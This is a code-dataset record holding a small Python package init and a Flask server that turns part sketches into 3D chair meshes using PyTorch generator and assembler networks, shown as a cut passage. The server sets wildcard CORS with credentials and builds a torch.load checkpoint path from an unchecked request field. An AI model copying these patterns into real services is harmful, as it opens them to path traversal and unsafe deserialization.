| 0
| 0
| 0
| 1
| 0.125
| true
| 0
| 0.125
| 0
| 0.25
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
8c1c1191b23e49be318b69b5a6ddca0d08039d3a
| 40
|
py
|
Python
|
djdt_pev/__init__.py
|
theY4Kman/djdt-pev
|
88162e38239ebbbfe7745baf410fc5b189fc5b9f
|
[
"MIT"
] | 2
|
2019-05-30T20:48:39.000Z
|
2020-09-12T22:56:54.000Z
|
djdt_pev/__init__.py
|
theY4Kman/djdt-pev
|
88162e38239ebbbfe7745baf410fc5b189fc5b9f
|
[
"MIT"
] | null | null | null |
djdt_pev/__init__.py
|
theY4Kman/djdt-pev
|
88162e38239ebbbfe7745baf410fc5b189fc5b9f
|
[
"MIT"
] | null | null | null |
from .panels.pev_sql import PevSQLPanel
| 20
| 39
| 0.85
| 6
| 40
| 5.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 40
| 1
| 40
| 40
| 0.916667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8c2ce325eae7094c54d3f660277deb50fae0c0a7
| 37,223
|
py
|
Python
|
UI/part_sketch_server/sketch_server.py
|
dongdu3/PartSketcher
|
e6acf14f97c315cc2b8512e7e5c606cbc7ba6438
|
[
"MIT"
] | 2
|
2022-02-20T05:03:53.000Z
|
2022-02-20T08:59:05.000Z
|
UI/part_sketch_server/sketch_server.py
|
dongdu3/PartSketcher
|
e6acf14f97c315cc2b8512e7e5c606cbc7ba6438
|
[
"MIT"
] | null | null | null |
UI/part_sketch_server/sketch_server.py
|
dongdu3/PartSketcher
|
e6acf14f97c315cc2b8512e7e5c606cbc7ba6438
|
[
"MIT"
] | null | null | null |
from flask import Flask, request
from flask import jsonify,make_response
import json
import re
import base64
from io import BytesIO
from io import StringIO,TextIOWrapper
from PIL import Image
import time
import argparse
import torch.backends.cudnn as cudnn
#from dataset_gen import *
from model import *
from common import *
from torchvision.utils import save_image
import torchvision.transforms as transforms
import os
from PIL import Image
import numpy as np
from utils import binvox_rw
from stl import mesh
import sys
import trimesh
import scipy
from trimesh.voxel import *
#######################################################################################################
#first we load the model
parser = argparse.ArgumentParser()
parser.add_argument('--dataRoot', type=str, default='/data/dudong/PartNet.v0/dataset', help='data root path')
parser.add_argument('--thres', type=float, default=0.2, help='threshold for occupancy estimation and mesh extraction')
parser.add_argument('--batchSize', type=int, default=1, help='input batch size')
parser.add_argument('--workers', type=int, help='number of data loading workers', default=1)
parser.add_argument('--model', type=str, default='checkpoint', help='model path')
parser.add_argument('--test', type=str, default='test', help='test results path')
parser.add_argument('--cat', type=str, default='Chair')
parser.add_argument('--cuda', type=str, default='0')
parser.add_argument('--spaceSize', type=int, default=128, help='voxel space size for assembly')
opt = parser.parse_args()
os.environ["CUDA_VISIBLE_DEVICES"] = opt.cuda
cudnn.benchmark = True
vox_res = 64
generator_model_path = './checkpoint/Chair/generator.pt'
generator_network = PartGenerator()
generator_network.load_state_dict(torch.load(generator_model_path,'cpu'))
generator_network.cuda()
generator_network.eval()
# load assemble model
assemble_model_path = './checkpoint/Chair/assembler.pt'
#create assemble network
assemble_network = PartAssembler()
assemble_network.load_state_dict(torch.load(assemble_model_path,map_location='cpu'))
assemble_network.cuda()
assemble_network.eval()
img_transform = transforms.Compose([
transforms.Resize((224, 224)),
transforms.ToTensor()
])
torch.set_grad_enabled(False)
cached_model_list = []
cached_vox_list = []
cached_pose_list = []
pts = make_3d_grid((-0.5,)*3, (0.5,)*3, (vox_res,)*3).contiguous().view(1, -1, 3)
pts = pts.float()
pts = pts.cuda()
def infer_shape_from_sketch_and_save(img):
sket_data = img_transform(img).float().contiguous()
sket_data = sket_data[:3,:,:]
sket_data = sket_data.unsqueeze(0)
sket_data = sket_data.cuda()
pts_occ_val = generator_network.predict(sket_data , pts)
pts_occ_val = pts_occ_val.contiguous().view(vox_res, vox_res, vox_res).cpu().data.numpy()
out_vox = pts_occ_val
#out_vox = np.array(pts_occ_val + (1. - opt.thres), dtype=np.uint8)
mesh = extract_mesh(pts_occ_val, threshold=opt.thres, n_face_simp=5000)
splitted_mesh = mesh.split()
if len(splitted_mesh) > 0:
chosen_id = -1
max_points = -1
for i in range(0,len(splitted_mesh)):
if (splitted_mesh[i].vertices.shape[0] > max_points):
chosen_id = i
max_points = splitted_mesh[i].vertices.shape[0]
mesh = splitted_mesh[chosen_id]
#trimesh.smoothing.filter_laplacian(mesh)
#mesh = trimesh.smoothing.filter_laplacian(mesh)
trimesh.smoothing.filter_taubin(mesh,iterations=10,nu=0.5,lamb=0.9)
output = mesh.export(file_type='ply',encoding='ascii')
return output, out_vox
def infer_shape_from_sketch_and_save_no_mesh(img):
sket_data = img_transform(img).float().contiguous()
sket_data = sket_data[:3,:,:]
sket_data = sket_data.unsqueeze(0)
sket_data = sket_data.cuda()
pts_occ_val = generator_network.predict(sket_data , pts)
pts_occ_val = pts_occ_val.contiguous().view(vox_res, vox_res, vox_res).cpu().data.numpy()
out_vox = pts_occ_val
# out_vox = np.array(pts_occ_val + (1. - opt.thres), dtype=np.uint8)
#mesh = extract_mesh(pts_occ_val, threshold=opt.thres, n_face_simp=5000)
#output = mesh.export(file_type='ply',encoding='ascii')
return out_vox
def infer_pose_from_sketch(full_img, part_img, part_vox):
full_img_data = img_transform(full_img)[:3,:,:]
part_img_data = img_transform(part_img)[:3,:,:]
sket_data = torch.cat((full_img_data, part_img_data),0)
sket_data = sket_data.unsqueeze(0)
vox_size = part_vox.shape[0]
vox_data = np.array(part_vox).reshape((1,1,vox_size,vox_size,vox_size))
vox_data = torch.from_numpy(vox_data).type(torch.FloatTensor)
sket_data = sket_data.cuda()
vox_data = vox_data.cuda()
pos_pre = assemble_network(sket_data,vox_data)
pos_pre_np = pos_pre.contiguous().view(-1).cpu().data.numpy() * opt.spaceSize
return pos_pre_np
############################################################################################################
app = Flask('woot-sketch-server')
def after_request(response):
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers["Access-Control-Allow-Credentials"]="true"
response.headers["Access-Control-Allow-Methods"]="*"
response.headers["Access-Control-Allow-Headers"]= "Content-Type,Access-Token"
response.headers["Access-Control-Expose-Headers"]= "*"
return response
app.after_request(after_request)
@app.route('/add', methods=['POST'])
def add():
print(request.json['a'],request.json['b'])
result = request.json['a'] + request.json['b']
return str(result)
@app.route('/initModel', methods=['POST'])
def initModel():
res = make_response(jsonify({}),200)
return res
image_path_to_save = './images_from_front_end/'
@app.route('/assembleFromImages', methods=['POST'])
def assembleFromImages():
torch.set_grad_enabled(False)
request_dict = json.loads(request.data)
cached_model_list = []
cached_vox_list = []
cached_part_pose_list = []
part_data_list = request_dict['part_image']
whole_image = Image.open(BytesIO(base64.b64decode(request_dict['whole_image'].split(',')[1]))).resize((256,256),Image.ANTIALIAS)
hx,hy = whole_image.size
fin_whole = Image.new('RGBA', whole_image.size, (255,255,255))
fin_whole.paste(whole_image,(0, 0, hx, hy), whole_image)
# infer
procesed_img_list = []
vox_array_list = []
vox_pose_list = []
vox_center_list = []
vox_length_list = []
for i in range(len(part_data_list)):
current_url = part_data_list[i].split(',')[1]
current_url = base64.b64decode(current_url)
current_url = BytesIO(current_url)
current_img = Image.open(current_url)
current_img = current_img.resize((256,256),Image.ANTIALIAS)
#add a white background
cx,cy = current_img.size
p = Image.new('RGBA', current_img.size, (255,255,255))
p.paste(current_img, (0, 0, cx, cy), current_img)
procesed_img_list.append(p)
cur_vox = infer_shape_from_sketch_and_save_no_mesh(p)
#cached_model_list.append(str(cur_mesh_bit,encoding='ascii'))
cached_vox_list.append(cur_vox)
vox_array_list.append(cur_vox.tolist())
#calculate the pose
for i in range(len(cached_vox_list)):
current_pose = infer_pose_from_sketch(fin_whole, procesed_img_list[i],cached_vox_list[i])
cached_part_pose_list.append(current_pose)
#vox_pose_list.append(current_pose.tolist())
#part_pos_to_list = [t.tolist() for t in cached_part_pose_list]
#start to assemble
whole_vox = np.zeros((opt.spaceSize, opt.spaceSize, opt.spaceSize), dtype=np.uint8)
#print("part num ",cached_part_pose_list)
center_arr = []
part_center_arr = []
scale_ratio_arr = []
voxel_to_send = []
current_mesh_list = []
for i in range(len(cached_part_pose_list)):
part_vox = cached_vox_list[i]
part_vox = np.array(part_vox, dtype='uint8')
#print('part vox shape', part_vox.shape)
#part_vox = np.array(part_vox)
part_size = part_vox.shape[0]
part_pos = np.where(part_vox > 0.1)
#print('part pose before',part_pos)
part_pos = np.array(part_pos).transpose()
#print('part pose after',part_pos)
part_bbox_min = np.min(part_pos, axis=0)
part_bbox_max = np.max(part_pos, axis=0)
part_center = (part_bbox_min + part_bbox_max) / 2.
part_scale = np.linalg.norm(part_bbox_max - part_bbox_min) / 2.
pos_pre = cached_part_pose_list[i]
center = np.array((pos_pre[0], pos_pre[1], pos_pre[2]), dtype=np.float)
scale = np.float(pos_pre[3])
scale_ratio = scale/part_scale
length = (part_bbox_max - part_bbox_min) * scale_ratio
bbox_min = np.array(np.clip(center - length / 2., a_min=0, a_max=opt.spaceSize-1), dtype=np.int)
length = np.ceil(length).astype(np.int)
print('b box min max',bbox_min)
#128 * 128 * 128
tmp_vox = np.zeros((opt.spaceSize, opt.spaceSize, opt.spaceSize), dtype=np.uint8)
tmp_vox[bbox_min[0]: bbox_min[0] + length[0], bbox_min[1]: bbox_min[1] + length[1],
bbox_min[2]: bbox_min[2] + length[2]] = 1
tmp_pos = np.where(tmp_vox > 0.1)
tmp_pos = np.array(tmp_pos, dtype=np.float).transpose()
tmp_pos_int = np.array(tmp_pos, dtype=np.int)
center_arr.append(center.tolist())
tmp_pos -= center
tmp_pos = tmp_pos/scale_ratio
scale_ratio_arr.append(scale_ratio)
tmp_pos += part_center
part_center_arr.append(part_center.tolist())
vox_center_list.append(part_center.tolist())
vox_length_list.append(scale_ratio)
tmp_pos_part_int = np.array(tmp_pos, dtype=np.int)
tmp_pos_part_int = np.clip(tmp_pos_part_int, a_min=0, a_max=part_size-1)
current_vox = np.zeros((opt.spaceSize, opt.spaceSize, opt.spaceSize), dtype=np.uint8)
whole_vox[tmp_pos_int[:, 0], tmp_pos_int[:, 1], tmp_pos_int[:, 2]] += part_vox[
tmp_pos_part_int[:, 0], tmp_pos_part_int[:, 1], tmp_pos_part_int[:, 2]]
current_vox[tmp_pos_int[:, 0], tmp_pos_int[:, 1], tmp_pos_int[:, 2]] += part_vox[
tmp_pos_part_int[:, 0], tmp_pos_part_int[:, 1], tmp_pos_part_int[:, 2]]
voxel_to_send.append(np.array(np.where(current_vox > 0.1)).tolist())
current_mesh = extract_mesh(current_vox.astype(np.float), threshold=opt.thres, n_face_simp=6000)
current_mesh_list.append(current_mesh)
current_mesh_ascii = current_mesh.export(file_type='ply',encoding='ascii')
cached_model_list.append(str(current_mesh_ascii,encoding='ascii'))
mesh = extract_mesh(whole_vox.astype(np.float), threshold=opt.thres, n_face_simp=6000)
mesh_ascii = mesh.export(file_type='ply',encoding='ascii')
print('fin cached part pose list',cached_part_pose_list)
#print(cached_model_list)
# each part pose
# each
ret_dict = {
'assembled_model': str(mesh_ascii,encoding='ascii'),
#'each_part_vox': voxel_to_send,
'each_part_mesh': cached_model_list,
}
res = jsonify(ret_dict)
#make_response(jsonify(ret_dict),200)
torch.cuda.empty_cache()
return res
@app.route('/assembleFromImagesNew', methods=['POST'])
def assembleFromImagesNew():
torch.set_grad_enabled(False)
request_dict = json.loads(request.data)
cached_model_list = []
cached_vox_list = []
cached_part_pose_list = []
part_data_list = request_dict['part_image']
whole_image = Image.open(BytesIO(base64.b64decode(request_dict['whole_image'].split(',')[1]))).resize((256,256),Image.ANTIALIAS)
hx,hy = whole_image.size
fin_whole = Image.new('RGBA', whole_image.size, (255,255,255))
fin_whole.paste(whole_image,(0, 0, hx, hy), whole_image)
part_vox_list = request_dict['part_vox']
# infer
procesed_img_list = []
vox_array_list = []
vox_pose_list = []
vox_center_list = []
vox_length_list = []
for i in range(len(part_data_list)):
current_url = part_data_list[i].split(',')[1]
current_url = base64.b64decode(current_url)
current_url = BytesIO(current_url)
current_img = Image.open(current_url)
current_img = current_img.resize((256,256),Image.ANTIALIAS)
#add a white background
cx,cy = current_img.size
p = Image.new('RGBA', current_img.size, (255,255,255))
p.paste(current_img, (0, 0, cx, cy), current_img)
procesed_img_list.append(p)
xs = np.array(part_vox_list[i][0],dtype=np.int)
ys = np.array(part_vox_list[i][1],dtype=np.int)
zs = np.array(part_vox_list[i][2],dtype=np.int)
v_s = np.array(part_vox_list[i][3],dtype=np.float).reshape(-1)
#voxres
cur_vox = np.zeros(shape=(vox_res,vox_res,vox_res),dtype=np.float)
cur_vox[xs,ys,zs] = v_s
#cur_vox = infer_shape_from_sketch_and_save_no_mesh(p)
#cached_model_list.append(str(cur_mesh_bit,encoding='ascii'))
cached_vox_list.append(cur_vox)
#vox_array_listvox_array_list.append(cur_vox.tolist())
#calculate the pose
for i in range(len(cached_vox_list)):
current_pose = infer_pose_from_sketch(fin_whole, procesed_img_list[i],cached_vox_list[i])
cached_part_pose_list.append(current_pose)
#vox_pose_list.append(current_pose.tolist())
#part_pos_to_list = [t.tolist() for t in cached_part_pose_list]
#start to assemble
whole_vox = np.zeros((opt.spaceSize, opt.spaceSize, opt.spaceSize), dtype=np.uint8)
#print("part num ",cached_part_pose_list)
center_arr = []
part_center_arr = []
scale_ratio_arr = []
voxel_to_send = []
cleaned_smoothed_mesh = []
cleaned_smoothed_face = []
cleaned_smoothed_points = []
base_vertices_num = 0
for i in range(len(cached_part_pose_list)):
part_vox = cached_vox_list[i]
part_vox = np.array(part_vox, dtype='float')
#print('part vox shape', part_vox.shape)
#part_vox = np.array(part_vox)
part_size = part_vox.shape[0]
part_pos = np.where(part_vox > 0.01)
#print('part pose before',part_pos)
part_pos = np.array(part_pos).transpose()
#print('part pose after',part_pos)
part_bbox_min = np.min(part_pos, axis=0)
part_bbox_max = np.max(part_pos, axis=0)
part_center = (part_bbox_min + part_bbox_max) / 2.
part_scale = np.linalg.norm(part_bbox_max - part_bbox_min) / 2.
pos_pre = cached_part_pose_list[i]
center = np.array((pos_pre[0], pos_pre[1], pos_pre[2]), dtype=np.float)
scale = np.float(pos_pre[3])
scale_ratio = scale/part_scale
length = (part_bbox_max - part_bbox_min) * scale_ratio
bbox_min = np.array(np.clip(center - length / 2., a_min=0, a_max=opt.spaceSize-1), dtype=np.int)
length = np.ceil(length).astype(np.int)
#print('b box min max',bbox_min)
#128 * 128 * 128
tmp_vox = np.zeros((opt.spaceSize, opt.spaceSize, opt.spaceSize), dtype=np.uint8)
tmp_vox[bbox_min[0]: bbox_min[0] + length[0], bbox_min[1]: bbox_min[1] + length[1],
bbox_min[2]: bbox_min[2] + length[2]] = 1
tmp_pos = np.where(tmp_vox > 0.01)
tmp_pos = np.array(tmp_pos, dtype=np.float).transpose()
tmp_pos_int = np.array(tmp_pos, dtype=np.int)
center_arr.append(center.tolist())
tmp_pos -= center
tmp_pos = tmp_pos/scale_ratio
scale_ratio_arr.append(scale_ratio)
tmp_pos += part_center
part_center_arr.append(part_center.tolist())
vox_center_list.append(part_center.tolist())
vox_length_list.append(scale_ratio)
tmp_pos_part_int = np.array(tmp_pos, dtype=np.int)
tmp_pos_part_int = np.clip(tmp_pos_part_int, a_min=0, a_max=part_size-1)
current_vox = np.zeros((opt.spaceSize, opt.spaceSize, opt.spaceSize), dtype=np.float)
#whole_vox[tmp_pos_int[:, 0], tmp_pos_int[:, 1], tmp_pos_int[:, 2]] += part_vox[
# tmp_pos_part_int[:, 0], tmp_pos_part_int[:, 1], tmp_pos_part_int[:, 2]]
current_vox[tmp_pos_int[:, 0], tmp_pos_int[:, 1], tmp_pos_int[:, 2]] += part_vox[
tmp_pos_part_int[:, 0], tmp_pos_part_int[:, 1], tmp_pos_part_int[:, 2]]
#voxel_to_send.append(np.array(np.where(current_vox > 0.1)).tolist())
current_mesh = extract_mesh(current_vox.astype(np.float), threshold=opt.thres, n_face_simp=5000)
splitted_mesh = current_mesh.split()
chosen_id = -1
max_points = -1
if(len(splitted_mesh)>0):
for i in range(0,len(splitted_mesh)):
if (splitted_mesh[i].vertices.shape[0] > max_points):
chosen_id = i
max_points = splitted_mesh[i].vertices.shape[0]
current_mesh = splitted_mesh[chosen_id]
trimesh.smoothing.filter_taubin(current_mesh,iterations=10,nu=0.5,lamb=0.9)
current_mesh_ascii = current_mesh.export(file_type='ply',encoding='ascii')
cached_model_list.append(str(current_mesh_ascii,encoding='ascii'))
cleaned_smoothed_mesh.append(current_mesh)
cleaned_smoothed_face += (current_mesh.faces + base_vertices_num).tolist()
cleaned_smoothed_points += current_mesh.vertices.tolist()
base_vertices_num += current_mesh.vertices.shape[0]
#interfaces.blender.boolean(cleaned_smoothed_mesh,operation='union', debug=False)
union_mesh = trimesh.Trimesh(vertices=np.array(cleaned_smoothed_points),faces=np.array(cleaned_smoothed_face))
"""
union_mesh.export('meshunion.ply')
fin_whole_vox = -1
cur_pitch = 1.0/128
occupancy_points = []
b_min = []
b_max = []
trimesh_mesh = []
for i in range(len(cleaned_smoothed_mesh)):
new_mesh = cleaned_smoothed_mesh[i]
new_mesh.remove_degenerate_faces()
trimesh.repair.fill_holes(new_mesh)
c_max = np.max(new_mesh.vertices,0)
c_min = np.min(new_mesh.vertices,0)
b_min.append(c_min.tolist())
b_max.append(c_max.tolist())
new_vox = new_mesh.voxelized(pitch=cur_pitch)
occupancy_points = occupancy_points + new_vox.indices_to_points(new_vox.sparse_indices).tolist()
trimesh_mesh.append(new_mesh)
b_min = np.min(np.array(b_min),0)
b_max = np.max(np.array(b_max),0)
b_mid = (b_min + b_max )*0.5
occupancy_points = np.array(occupancy_points)
#print("occupancy points shape",np.max((occupancy_points),0),np.min((occupancy_points),0))
occupancy_points += 0.5
occupancy_points *= opt.spaceSize
occupancy_points_int = np.array(occupancy_points, dtype=np.int)
occupancy_points_int = np.clip(occupancy_points_int, a_min=0, a_max=opt.spaceSize-1)
whole_occ_grid = np.zeros((opt.spaceSize, opt.spaceSize, opt.spaceSize), dtype=np.float)
whole_occ_grid[occupancy_points_int[:,0],occupancy_points_int[:,1],occupancy_points_int[:,2]] += 0.5
fin_mesh = extract_mesh(whole_occ_grid.astype(np.float), threshold=opt.thres)
#trimesh.smoothing.filter_taubin(fin_mesh)
n_min, n_max = np.min(fin_mesh.vertices,0), np.max(fin_mesh.vertices,0)
fin_mesh.vertices *= (b_max-b_min) / (n_max-n_min)
n_min, n_max = np.min(fin_mesh.vertices,0), np.max(fin_mesh.vertices,0)
n_mid = (n_min + n_max) * 0.5
fin_mesh.vertices += b_mid - n_mid
#fin_mesh.export('full_mesh.ply')
trimesh.smoothing.filter_humphrey(fin_mesh)
"""
fin_mesh_ascii = union_mesh.export(file_type='ply',encoding='ascii')
ret_dict = {
'assembled_model': str(fin_mesh_ascii,encoding='ascii'),
'each_part_mesh': cached_model_list,
}
res = jsonify(ret_dict)
#make_response(jsonify(ret_dict),200)
torch.cuda.empty_cache()
return res
"""
@app.route('/assembleFromImagesNew', methods=['POST'])
def assembleFromImagesNew():
torch.set_grad_enabled(False)
request_dict = json.loads(request.data)
cached_model_list = []
cached_vox_list = []
cached_part_pose_list = []
part_data_list = request_dict['part_image']
whole_image = Image.open(BytesIO(base64.b64decode(request_dict['whole_image'].split(',')[1]))).resize((256,256),Image.ANTIALIAS)
hx,hy = whole_image.size
fin_whole = Image.new('RGBA', whole_image.size, (255,255,255))
fin_whole.paste(whole_image,(0, 0, hx, hy), whole_image)
part_vox_list = request_dict['part_vox']
# infer
procesed_img_list = []
vox_array_list = []
vox_pose_list = []
vox_center_list = []
vox_length_list = []
for i in range(len(part_data_list)):
current_url = part_data_list[i].split(',')[1]
current_url = base64.b64decode(current_url)
current_url = BytesIO(current_url)
current_img = Image.open(current_url)
current_img = current_img.resize((256,256),Image.ANTIALIAS)
#add a white background
cx,cy = current_img.size
p = Image.new('RGBA', current_img.size, (255,255,255))
p.paste(current_img, (0, 0, cx, cy), current_img)
procesed_img_list.append(p)
xs = np.array(part_vox_list[i][0],dtype=np.int)
ys = np.array(part_vox_list[i][1],dtype=np.int)
zs = np.array(part_vox_list[i][2],dtype=np.int)
v_s = np.array(part_vox_list[i][3],dtype=np.float).reshape(-1)
#voxres
cur_vox = np.zeros(shape=(vox_res,vox_res,vox_res),dtype=np.float)
cur_vox[xs,ys,zs] = v_s
cached_vox_list.append(cur_vox)
#vox_array_listvox_array_list.append(cur_vox.tolist())
#calculate the pose
for i in range(len(cached_vox_list)):
current_pose = infer_pose_from_sketch(fin_whole, procesed_img_list[i],cached_vox_list[i])
cached_part_pose_list.append(current_pose)
#vox_pose_list.append(current_pose.tolist())
#part_pos_to_list = [t.tolist() for t in cached_part_pose_list]
#start to assemble
whole_vox = np.zeros((opt.spaceSize, opt.spaceSize, opt.spaceSize), dtype=np.float)
#print("part num ",cached_part_pose_list)
center_arr = []
part_center_arr = []
scale_ratio_arr = []
voxel_to_send = []
cleaned_smoothed_mesh = []
org_vox = []
with_noise_max = []
with_noise_min = []
for i in range(len(cached_part_pose_list)):
part_vox = cached_vox_list[i]
part_vox = np.array(part_vox, dtype='float')
part_size = part_vox.shape[0]
part_pos = np.where(part_vox > 0.01)
#print('part pose before',part_pos)
part_pos = np.array(part_pos).transpose()
#print('part pose after',part_pos)
part_bbox_min = np.min(part_pos, axis=0)
part_bbox_max = np.max(part_pos, axis=0)
part_center = (part_bbox_min + part_bbox_max) / 2.
part_scale = np.linalg.norm(part_bbox_max - part_bbox_min) / 2.
pos_pre = cached_part_pose_list[i]
center = np.array((pos_pre[0], pos_pre[1], pos_pre[2]), dtype=np.float)
scale = np.float(pos_pre[3])
scale_ratio = scale/part_scale
length = (part_bbox_max - part_bbox_min) * scale_ratio
bbox_min = np.array(np.clip(center - length / 2., a_min=0, a_max=opt.spaceSize-1), dtype=np.int)
length = np.ceil(length).astype(np.int)
tmp_vox = np.zeros((opt.spaceSize, opt.spaceSize, opt.spaceSize), dtype=np.uint8)
tmp_vox[bbox_min[0]: bbox_min[0] + length[0], bbox_min[1]: bbox_min[1] + length[1],
bbox_min[2]: bbox_min[2] + length[2]] = 1
tmp_pos = np.where(tmp_vox > 0.01)
tmp_pos = np.array(tmp_pos, dtype=np.float).transpose()
tmp_pos_int = np.array(tmp_pos, dtype=np.int)
center_arr.append(center.tolist())
tmp_pos -= center
tmp_pos = tmp_pos/scale_ratio
scale_ratio_arr.append(scale_ratio)
tmp_pos += part_center
part_center_arr.append(part_center.tolist())
vox_center_list.append(part_center.tolist())
vox_length_list.append(scale_ratio)
tmp_pos_part_int = np.array(tmp_pos, dtype=np.int)
tmp_pos_part_int = np.clip(tmp_pos_part_int, a_min=0, a_max=part_size-1)
current_vox = np.zeros((opt.spaceSize, opt.spaceSize, opt.spaceSize), dtype=np.float)
current_vox[tmp_pos_int[:, 0], tmp_pos_int[:, 1], tmp_pos_int[:, 2]] += part_vox[
tmp_pos_part_int[:, 0], tmp_pos_part_int[:, 1], tmp_pos_part_int[:, 2]]
whole_vox[tmp_pos_int[:, 0], tmp_pos_int[:, 1], tmp_pos_int[:, 2]] += part_vox[
tmp_pos_part_int[:, 0], tmp_pos_part_int[:, 1], tmp_pos_part_int[:, 2]]
org_vox.append(current_vox)
#voxel_to_send.append(np.array(np.where(current_vox > 0.1)).tolist())
current_mesh = extract_mesh(current_vox.astype(np.float), threshold=opt.thres, n_face_simp=5000)
cur_with_noise_max = np.max(current_mesh.vertices,0)
cur_with_noise_min = np.min(current_mesh.vertices,0)
with_noise_max.append(cur_with_noise_max)
with_noise_min.append(cur_with_noise_min)
splitted_mesh = current_mesh.split()
chosen_id = -1
max_points = -1
if(len(splitted_mesh)>0):
for i in range(0,len(splitted_mesh)):
if (splitted_mesh[i].vertices.shape[0] > max_points):
chosen_id = i
max_points = splitted_mesh[i].vertices.shape[0]
current_mesh = splitted_mesh[chosen_id]
trimesh.smoothing.filter_taubin(current_mesh,iterations=20,nu=0.5,lamb=0.9)
current_mesh_ascii = current_mesh.export(file_type='ply',encoding='ascii')
cached_model_list.append(str(current_mesh_ascii,encoding='ascii'))
cleaned_smoothed_mesh.append(current_mesh)
#merged_mesh = trimesh.creation(current_mesh_list)
#merged_mesh.export("yahoo.ply")
whole_mesh = extract_mesh(whole_vox.astype(np.float), threshold=opt.thres, n_face_simp=10000)
splitted_mesh = whole_mesh.split()
chosen_id = -1
max_points = -1
if(len(splitted_mesh)>0):
for i in range(0,len(splitted_mesh)):
if (splitted_mesh[i].vertices.shape[0] > max_points):
chosen_id = i
max_points = splitted_mesh[i].vertices.shape[0]
whole_mesh = splitted_mesh[chosen_id]
fin_mesh_ascii = whole_mesh.export(file_type='ply',encoding='ascii')
ret_dict = {
'assembled_model': str(fin_mesh_ascii,encoding='ascii'),
'each_part_mesh': cached_model_list,
}
res = jsonify(ret_dict)
#make_response(jsonify(ret_dict),200)
torch.cuda.empty_cache()
return res
"""
@app.route('/inferAllParts',methods=['POST'])
def inferAllParts():
torch.set_grad_enabled(False)
request_dict = json.loads(request.data)
cached_model_list = []
cached_vox_list = []
part_data_list = request_dict['part_image']
current_vox_array_list = []
for i in range(len(part_data_list)):
current_url = part_data_list[i].split(',')[1]
current_url = base64.b64decode(current_url)
current_url = BytesIO(current_url)
current_img = Image.open(current_url)
#print('channel num',current_img.)
current_img = current_img.resize((256,256),Image.ANTIALIAS)
#add a white background
cx,cy = current_img.size
p = Image.new('RGBA', current_img.size, (255,255,255))
p.paste(current_img, (0, 0, cx, cy), current_img)
cur_mesh_bit, cur_vox = infer_shape_from_sketch_and_save(p)
cached_model_list.append(str(cur_mesh_bit,encoding='ascii'))
cur_idx = np.where(cur_vox>0.01)
cur_vox_value = cur_vox[cur_idx[0],cur_idx[1],cur_idx[2]]
cached_vox_list.append([cur_idx[0].tolist(), cur_idx[1].tolist(),cur_idx[2].tolist(),cur_vox_value.tolist()])
#print(np.where(cur_vox>0))
#print(cached_model_list)
ret_dict = {
'all_parts': cached_model_list,
'all_voxes':cached_vox_list,
}
res = jsonify(ret_dict)
#make_response(jsonify(ret_dict),200)
torch.cuda.empty_cache()
return res
@app.route('/changeModelType',methods=['POST'])
def changeModelType():
request_dict = json.loads(request.data)
next_model_type = request_dict['modelType']
if(True):
generator_model_path = './checkpoint/'+ next_model_type + '/generator.pt'
generator_network.load_state_dict(torch.load(generator_model_path,'cpu'))
generator_network.cuda()
generator_network.eval()
# load assemble model
assemble_model_path = './checkpoint/'+ next_model_type + '/assembler.pt'
assemble_network.load_state_dict(torch.load(assemble_model_path,map_location='cpu'))
assemble_network.cuda()
assemble_network.eval()
ret_dict = {
'spaceholder':'heihei'
}
res = jsonify(ret_dict)
return res
@app.route('/generateTransformedResults',methods=['POST'])
def generateTransformedResults():
request_dict = json.loads(request.data)
print(request_dict.keys())
mesh_arr = []
tranform_arr = []
scale_arr = []
trimesh_mesh = []
part_vox_info_arr = []
#print(request_dict['scale_arr'],request_dict['transform_arr'])
for i in range(len(request_dict['scale_arr'])):
scale_arr.append(np.array([request_dict['scale_arr'][i][0],request_dict['scale_arr'][i][1],request_dict['scale_arr'][i][2]]) )
tranform_arr.append(np.array([request_dict['transform_arr'][i][0],request_dict['transform_arr'][i][1],request_dict['transform_arr'][i][2]]))
mesh_arr.append(request_dict['mesh_string_arr'][i])
fin_whole_vox = -1
cur_pitch = 1.0/128
occupancy_points = []
b_min = []
b_max = []
cleaned_smoothed_face = []
cleaned_smoothed_points = []
base_vertices_num = 0
for i in range(len(mesh_arr)):
new_mesh = trimesh.load(file_obj= BytesIO(mesh_arr[i].encode(encoding='utf-8')),file_type='ply')
new_mesh.remove_degenerate_faces()
#print('mesh shape',i,new_mesh.vertices.shape,new_mesh.is_watertight)
trimesh.repair.fill_holes(new_mesh)
#print(scale_arr[i],tranform_arr[i])
new_mesh.vertices[:,0] *= scale_arr[i][0]
new_mesh.vertices[:,1] *= scale_arr[i][1]
new_mesh.vertices[:,2] *= scale_arr[i][2]
new_mesh.vertices[:,0] += tranform_arr[i][0]
new_mesh.vertices[:,1] += tranform_arr[i][1]
new_mesh.vertices[:,2] += tranform_arr[i][2]
c_max = np.max(new_mesh.vertices,0)
c_min = np.min(new_mesh.vertices,0)
b_min.append(c_min.tolist())
b_max.append(c_max.tolist())
new_vox = new_mesh.voxelized(pitch=cur_pitch)
print(new_vox.scale)
occupancy_points = occupancy_points + new_vox.indices_to_points(new_vox.sparse_indices).tolist()
trimesh_mesh.append(new_mesh)
#cleaned_smoothed_mesh.append(current_mesh)
cleaned_smoothed_face += (new_mesh.faces + base_vertices_num).tolist()
cleaned_smoothed_points += new_mesh.vertices.tolist()
base_vertices_num += new_mesh.vertices.shape[0]
union_mesh = trimesh.Trimesh(vertices=np.array(cleaned_smoothed_points),faces=np.array(cleaned_smoothed_face))
#union_vox = trimesh.voxel.creation.voxelize(union_mesh,pitch=cur_pitch)
fin_mesh_ascii = union_mesh.export(file_type='ply',encoding='ascii')
